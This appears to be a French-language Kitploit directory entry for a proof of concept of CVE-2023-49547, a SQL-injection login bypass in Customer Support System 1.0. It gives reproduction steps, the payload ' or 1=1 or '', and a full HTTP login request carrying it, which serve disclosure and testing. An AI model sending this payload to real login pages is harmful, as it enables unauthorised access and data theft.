Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-49547 — Système de support client 1.0 - Contournement de connexion par injection SQL | Kitploit
Outils/GitHubGitHub/geraldoalcantara/cve-2023-49547
Authentification et AutorisationAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubgeraldoalcantara/cve-2023-49547

CVE-2023-49547

Système de support client 1.0 - Contournement de connexion par injection SQL

Voir le dépôt
4il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-49547

Système de Support Client 1.0 - Contournement de connexion par injection SQL

Description : Le Customer Support System 1.0 est vulnérable à une injection SQL. Une vulnérabilité d'injection SQL dans Customer Support System 1.0 permet à des attaquants distants non authentifiés de contourner le processus d'authentification en exploitant le paramètre username.

Version du produit vulnérable : Customer Support System 1.0
Auteur CVE : Geraldo Alcântara
Date : 28/11/2023
Confirmé le : 19/12/2023
CVE : CVE-2023-49547
Testé sur : Windows

Étapes à reproduire :

  1. Visitez la page de connexion.
  2. Lors de la requête, insérez la charge utile malveillante (' or 1=1 or '') dans le paramètre username.
  3. En plus du contournement d'authentification, il est possible d'extraire des informations de la base de données en utilisant des attaques basées sur le temps et booléennes.

Requête : Contournement d'authentification :

root@kitploit:~
POST /customer_support/ajax.php?action=login HTTP/1.1
Host: 192.168.68.148
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: */*
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 54
Origin: http://192.168.68.148
Connection: close
Referer: http://192.168.68.148/customer_support/login.php
Cookie: csrftoken=1hWW6JE5vLFhJv2y8LwgL3WNPbPJ3J2WAX9F2U0Fd5H5t6DSztkJWD4nWFrbF8ko; sessionid=xrn1sshbol1vipddxsijmgkdp2q4qdgq; PHPSESSID=abige9ar0b1bi3qcf9mkv258o3

username='+or+1%3D1+or+''%3D'&password=password&type=1

Temps basé : 20 secondes time01

Temps basé : 2 secondes time02

Découvreur(s)/Crédits :
Geraldo Alcântara

Télécharger l’outil